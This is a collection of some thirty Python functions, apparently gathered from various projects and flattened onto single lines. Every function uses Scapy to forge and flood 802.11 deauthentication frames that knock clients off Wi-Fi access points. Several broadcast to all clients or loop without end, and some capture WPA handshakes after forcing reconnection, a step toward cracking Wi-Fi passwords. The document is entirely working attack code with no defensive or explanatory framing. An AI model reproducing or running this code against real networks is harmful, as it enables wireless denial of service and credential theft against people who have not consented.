def run(self): while True: if self.flag: raise Exception('Stop sending deauth packet') for ap in self.AP_list: address = ap[0] deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=address, addr3=address) / Dot11Deauth() send(deauth_ap, inter=0, count=5) print ls(deauth_ap) if len(self.clients_APs) > 0: with self.lock: for x in self.clients_APs: client = x[0] ap = x[1] ch = x[2] deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth() deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client) / Dot11Deauth() send(deauth_pkt1, inter=0, count=1) send(deauth_pkt2, inter=0, count=1)
def hack(self): if self.mode is "ALL": for ap in self.ap_list: if int(ap[1]) == self.channel: address = ap[0] deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=address, addr3=address) / Dot11Deauth() send(deauth_ap, inter=0.00001, count=5) elif self.mode is "AP": for ap in self.ap_list: if int(ap[1]) == self.channel: address = ap[0] deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=address, addr3=address) / Dot11Deauth() send(deauth_ap, inter=0.00001, count=5) elif self.mode is "CLIENT": if int(self.ap[1]) == self.channel: deauth_ap = Dot11(addr1=self.client, addr2=self.ap[0], addr3=self.ap[0]) / Dot11Deauth() send(deauth_ap, inter=0.00001, count=5)
def shoot(self, tgt): self.__c_TGT = tgt sniffer_thread = threading.Thread(target=self.start_eapol_sniffer) sniffer_thread.daemon = True sniffer_thread.start() while not self.__SNIFFER_STATUS: time.sleep(1) __pkt_to_cl = RadioTap() / Dot11( addr1=tgt, addr2=self.bssid, addr3=self.bssid) / Dot11Deauth(reason=7) __pkt_to_ap = RadioTap() / Dot11( addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7) for n in range(32 * 1): sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False) sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False) while self.__SNIFFER_STATUS: time.sleep(1) self.__SNIFFER_STATUS = not bool(self.__SNIFFER_STATUS) if self.verify_handshake(tgt): return (True, self.__c_HANDSHAKE) else: return (False, [])
def deauth_client(self, client): dic = {} global cicl if self.count == 0: cicl = 50 else: cicl = self.count radio = b'\x00\x00\x0c\x00\x04\x80\x00\x00\x02\x00\x18\x00' deauth = bytes(Dot11Deauth(reason=7)) #ID=14849 #SC=iter, for iter in range(1, cicl): ap = radio + bytes(Dot11(type=0, subtype=12,ID=14849, addr1=self.client, addr2=self.bssid, addr3=self.bssid,SC=iter)) + \ bytes(Dot11Deauth(reason=7)) dic['src_mac'] = self.bssid dic['dst_mac'] = self.client dic['type'] = 'Deauth' dic['reason'] = 'Не подключенный клиент пытаетс отправить данные' self.write_to_file(self.out, json.dumps(dic)) cl = radio + bytes(Dot11(type=0, subtype=12,ID=14849, addr1=self.bssid, addr2=self.client, addr3=self.bssid,SC=iter+1)) + \ bytes(Dot11Deauth(reason=7)) #tmp_cl = Dot11(type=0, subtype=12,ID=14849, addr1=self.bssid, addr2=self.client, addr3=self.bssid) #dot11_cl = tmp_cl[0:-2] #sn_cl = (hex(iter + 1) + '\x00').encode() #packet_cl = radio + dot11_cl + sn_cl + deauth sendp(ap, iface=self.iface, count=5, verbose=0) sendp(cl, iface=self.iface, count=5, verbose=0) if not self.event.is_set(): break
def deauth(self, e): global SEQ_NUM pkts = [] deauth_pkt1 = RadioTap() / Dot11(addr1=self.client_mac, addr2=self.ap_mac, addr3=self.ap_mac) / Dot11Deauth() deauth_pkt2 = RadioTap() / Dot11( addr1=self.ap_mac, addr2=self.client_mac, addr3=self.client_mac) / Dot11Deauth() ''' Channel Switch Announcement + Dot11 \x0d Action + Raw \x00 Management \x04 CSA \x25 Element ID [37] \x03 Length \x00 Channel Switch Mode \x04 New Channel Num \x00 Channel Switch Count ''' csa_pkt = RadioTap() / Dot11( addr1=self.client_mac, addr2=self.ap_mac, addr3=self.ap_mac, type=0, subtype=0x0d) / Raw("\x00\x04\x25\x03\x00" + chr(self.client_channel) + "\x00") #csa_pkt = Jammer.append_csa(self.my_beacon, 56) pkts.append(deauth_pkt1) pkts.append(deauth_pkt2) pkts.append(csa_pkt) deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[ RadioTap].notdecoded[:10] + channels[ self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:] deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[ RadioTap].notdecoded[:10] + channels[ self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:] logger.log("Starting deauth on AP [G]" + self.ap_mac + "[/G] (" + self.ap_ssid + ") and client [G]" + self.client_mac + "[/G]...") while not e.isSet(): for p in pkts: SEQ_NUM += 1 p[RadioTap].SC = SEQ_NUM p[Dot11].FCfield |= 0x20 sendp(p, iface=self.iface_ap, inter=0.1 / len(pkts)) logger.log("Deauth [G]stopped[/G]")
def perform_deauth(router, client, iface): pckt = RadioTap() / Dot11(addr1=client, addr2=router, addr3=router) / Dot11Deauth(reason=4) cli_to_ap_pckt = RadioTap() / Dot11(addr1=router, addr2=client, addr3=client) / Dot11Deauth(reason=7) print('Sending Deauth to ' + client + ' from ' + router) try: for i in range(100): sendp(pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0) sendp(cli_to_ap_pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0) print("\U0001F608") except Exception as e: print(f"error: {e}")
def forge_ap_cl(self): _pkt_ap = RadioTap() / Dot11(addr1=self.cl, addr2=self.ap, addr3=self.ap) / Dot11Deauth(reason=7) _pkt_cl = RadioTap() / Dot11(addr1=self.ap, addr2=self.cl, addr3=self.cl) / Dot11Deauth(reason=7) if self.unlimited: while True: self.flood_ap_cl(_pkt_ap, _pkt_cl) else: for _count in range(0, self.count): self.flood_ap_cl(_pkt_ap, _pkt_cl)
def shoot(self, _sn, _rc): _pkt_ap_to_cl = RadioTap() / Dot11(addr1=_rc, addr2=_sn, addr3=_sn) / Dot11Deauth(reason=7) _pkt_cl_to_ap = RadioTap() / Dot11(addr1=_sn, addr2=_rc, addr3=_rc) / Dot11Deauth(reason=7) sendp(_pkt_ap_to_cl, iface=self.iface, count=self.deauth, verbose=False) sendp(_pkt_cl_to_ap, iface=self.iface, count=self.deauth, verbose=False) time.sleep(0.80)
def start(): ap = args.bssid client = args.client pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth() pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth() for n in range(int(args.number)): sendp(pkt, iface=args.iface, verbose=0) print("Send deauth packet: " + termcolor(ap, "green") + " (ap) > " + termcolor(client, "blue") + " (client) via " + termcolor(args.iface, "red") + " #" + str(n + 1)) sleep(0.5) sendp(pkt1, iface=args.iface, verbose=0) print("Send deauth packet: " + termcolor(client, "blue") + " (client) > " + termcolor(ap, "green") + " (ap) via " + termcolor(args.iface, "red") + " #" + str(n + 1))
def deauth_all(self): dic = {} global cicl if self.count == 0: cicl = 80 else: cicl = self.count radio = b'\x00\x00\x0c\x00\x04\x80\x00\x00\x02\x00\x18\x00' #deauth = bytes(Dot11Deauth(reason=15)) for iter in range(1, cicl): ap_mobile = radio + bytes( Dot11(type=0, subtype=12, ID=14849, addr1='ff:ff:ff:ff:ff:ff', addr2=self.bssid, addr3=self.bssid, SC=iter) / Dot11Deauth(reason=15)) dic['src_mac'] = self.bssid dic['dst_mac'] = 'ff:ff:ff:ff:ff:ff' dic['type'] = 'Deauth' dic['reason'] = 'Врем четырехстороннего рукопожати истекло' self.write_to_file(self.out, json.dumps(dic)) #packet = radio + dot11 + sn + deauth sendp(ap_mobile, iface=self.iface, count=4, verbose=0) if not self.event.is_set(): break
def pp_deauth(blacklist): """ Starts deauthentication attack for PineAP Suite. """ os.system("reset") print "\033[1m" + banner_dos print colored( "\n------------------- ̿' ̿'\̵͇̿̿\з=(◕_◕)=ε/̵͇̿̿/'̿'̿ ---------------------\n̿", "red") print "\033[1m[--] TARGET(s): ", blacklist time.sleep(1) print "\033[1m[*] Deauthing PineAP client devices" time.sleep(2) print "\033[1m[*] Channel number being set\n" time.sleep(2) for d in blacklist: clist = sniff(iface=iface, count=30) channel = find_channel(clist, d) os.system("iwconfig wlan1mon channel " + str(channel)) print "\033[1m[*] Sending 120 deauthentication packets to ", d deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=d.lower(), addr3=d.lower()) / Dot11Deauth() sendp(deauth, iface=iface, count=120, inter=.2, verbose=False) time.sleep(1) print "\033[1m[*] Attack completed" time.sleep(2)
def deauth_attack(gateway_mac, interface, target_mac): #target_mac = "ff:ff:ff:ff:ff:ff" #target_mac = "08:c5:e1:87:79:c1" packet = RadioTap() / Dot11(type=0, subtype=12, addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac) / Dot11Deauth(reason=7) sendp(packet, iface=interface, count=10000, inter=0.1)
def attack_wlan(Client_mac, A_point_mac, M_mode): # addr1: destination MAC # addr2: source MAC # addr3: Access Point MAC dot11 = Dot11(addr1=Client_mac, addr2=A_point_mac, addr3=A_point_mac) # stack them up packet = RadioTap() / dot11 / Dot11Deauth(reason=7) # send the packet sendp(packet, inter=0.1, count=100, iface=M_mode, verbose=1)
def deauth(self): deauthPacket = RadioTap() / Dot11( type=0, subtype=12, addr1=self.macTarget, addr2=self.macAP, addr3=self.macAP) / Dot11Deauth(reason=7) while True: sendp(deauthPacket, iface=self.interface, count=1, verbose=True) sleep(30)
def deauth(ap, client): i = 0 time.sleep(3) while (i < 2): # Deauthentication Packet For Access Point pkt = RadioTap() / Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth() print("Deauth to: %s" % (client)) sendp(pkt, iface=interface) i += 1
def deauth(): ssid_mac = raw_input( 'Please enter the SSID mac for Deauthentication Attack: \n') while (not is_mac_valid(ssid_mac)): ssid_mac = raw_input('Wrong MAC address please try again: \n') is_mac_valid(ssid_mac) print('making attack for mac -> %s \n' % ssid_mac) dot11 = Dot11(addr1=ssid_mac, addr2=target, addr3=target) packet = RadioTap() / dot11 / Dot11Deauth() sendp(packet, inter=0.001, count=1000, iface=interface)
def run_deauth(self): # get client MAC from selected row row = self.sel_client_table.currentIndex().row() deauth_client = self.sel_client_table.item(row, 0).text() # RadioTap() is first layer wireless packer, Dot11() Management layer Dot11Deauth() creates deauth frame. pkt = RadioTap() / Dot11(addr1=deauth_client, addr2=self.deauth_ap) / Dot11Deauth() for i in range(50): sendp(pkt, iface="wlp3s0mon")
def run(self): while True: if self.flag: raise Exception('Stop sending deauth packet') for ap in self.AP_list: address = ap[0] deauth_ap = Dot11(addr1=self.client, addr2=address, addr3=address) / Dot11Deauth() print ls(deauth_ap) send(deauth_ap, inter=0, count=1)
def disconnect_all(gateway_mac, interface): target_mac = "ff:ff:ff:ff:ff:ff" # 802.11 frame # addr1: destination MAC # addr2: source MAC # addr3: Access Point MAC dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac) # stack them up packet = RadioTap() / dot11 / Dot11Deauth(reason=7) #radioTap- header in IEEE 802.11, # send the packet sendp(packet, inter=0.1, count=100, iface=interface, verbose=1)
def forge_ap(self): _broadct = "ff:ff:ff:ff:ff:ff" _pkt_ap = RadioTap() / Dot11(addr1=_broadct, addr2=self.ap, addr3=self.ap) / Dot11Deauth(reason=7) if self.unlimited: while True: self.flood_ap(_pkt_ap, _broadct) else: for _count in range(0, self.count): self.flood_ap(_pkt_ap, _broadct)
def attack(self): client = "FF:FF:FF:FF:FF:FF" for i in range(0, len(self.found_APs)-1): print("Now deauthing all users from " + self.found_APs[1]) ap = self.found_APs[i] # deauth packet for AP packet = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth() #interface must be the monitor one sendp(packet, iface=self.valueObj.interfaceName, count=self.valueObj.count, inter=0.1 ,verbose=1)
def remote_deauth(): interface = input("Please enter wireless interface name >") ap = input("Access Point mac address >") target = input("Target mac address >") pkt = RadioTap() / Dot11(addr1=target, addr2=ap, addr3=ap) / Dot11Deauth(reason=2) print("Press CTRL-C to stop") while True: try: sendp(pkt, iface=interface, verbose=False) except KeyboardInterrupt: sys.exit("Quiting") except OSError: sys.exit("Please enter an valid wireless interface")
def shoot(self, tgt, deauth, _phaz_instance): self.__c_TGT = tgt if not self.__SNIFFER_STATUS: sniffer_thread = threading.Thread(target=self.start_eapol_sniffer) sniffer_thread.daemon = True sniffer_thread.start() while not self.__SNIFFER_STATUS: time.sleep(1) __pkt_to_cl = RadioTap() / Dot11( addr1=tgt, addr2=self.bssid, addr3=self.bssid) / Dot11Deauth(reason=7) __pkt_to_ap = RadioTap() / Dot11( addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7) for n in range(deauth * 1): sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False) sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False) if self.verify_handshake(tgt): _phaz_instance.THEPOL = tuple(self.__c_HANDSHAKE)
def perform_deauth(bssid, client, count): pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth() cli_to_ap_pckt = None if client != 'FF:FF:FF:FF:FF:FF': cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth() print 'Sending Deauth to ' + client + ' from ' + bssid if not count: print 'Press CTRL+C to quit' # Send the packets in bursts of 64, then sleep for half a sec or so while count != 0: try: for i in range(64): # Send out deauth from the AP send(pckt) # If we're targeting a client, we will also spoof deauth from the client to the AP if client != 'FF:FF:FF:FF:FF:FF': scapy.all.send(cli_to_ap_pckt) # If count was -1, this will be an infinite loop count -= 1 except KeyboardInterrupt: break
def deauth(interface, gateway_mac, target_mac): #MAC destination, MAC source, MAC Access Point dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac) # stack all layers packet = RadioTap() / dot11 / Dot11Deauth(reason=7) print( "start sending deauth packets with gateway_mac: %s to target_mac: %s" % (gateway_mac, target_mac)) # send deauth packet sendp(packet, inter=0.1, count=10000, iface=interface, verbose=1)
def deauth(self, mac, target_mac, iface): mac = str(mac) target_mac = str(target_mac) pkt = RadioTap() / Dot11(addr1=target_mac, addr2=mac, addr3=mac) / Dot11Deauth(reason=2) os.system('sudo ifconfig %s down' % (iface)) os.system('sudo iwconfig %s mode monitor' % (iface)) os.system('sudo ifconfig %s up' % (iface)) while True: try: sendp(pkt, iface=iface, verbose=False) except: print("Client down") break
def run(self): dot11 = Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.target, addr3=self.target) packet = RadioTap() / dot11 / Dot11Deauth(reason=7) try: sendp(packet, inter=0.1, count=None, loop=1, iface=self.interface, verbose=0) except Exception as e: logging.exception(e) print("DOS STOPPED")
def pp_deauth(blacklist): """ Starts deauthentication attack for PineAP Suite. """ attack_start = "[*] Attack has started for " + str(blacklist) print colored(attack_start, 'red', attrs=['reverse', 'blink']) time.sleep(2) channel = 1 for target in blacklist: clist = sniff(iface=iface, count=50) channel = find_channel(clist, target) deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=target.lower(), addr3=target.lower()) / Dot11Deauth() sendp(deauth, iface=iface, count=120, inter=.2, verbose=False) time.sleep(1) print colored("[*] Attack has completed..", 'green', attrs=['reverse', 'blink']) time.sleep(2)
def disassociate(self): # Forge the dot11 disassociation packet dis_packet = RadioTap() / Dot11( type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac) / Dot11Deauth(reason=self.reason) # Loop to send the disassociation packets to the victim device while True: # Repeat every delay value seconds time.sleep(self.delay) print("[" + str(datetime.now().time()) + "][+] Disassociation frames (reason " + str(self.reason) + ") sent to target " + self.target_mac + " as sender endpoint " + self.other_mac) sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)
def deauth(self, target_mac: str, source_mac: str, count=1, burst_count=200, channel=None, reason=7): self.channel_lock.acquire() if channel: self.set_channel(channel) pkt = RadioTap() / Dot11(type=0, subtype=12, addr1=target_mac, addr2=source_mac, addr3=self.bssid) / Dot11Deauth(reason=reason) for i in range(count): cprint("DEAUTH!!!", 'red') for j in range(burst_count): self.inject(pkt) if count > 1: sleep(.1) self.channel_lock.release()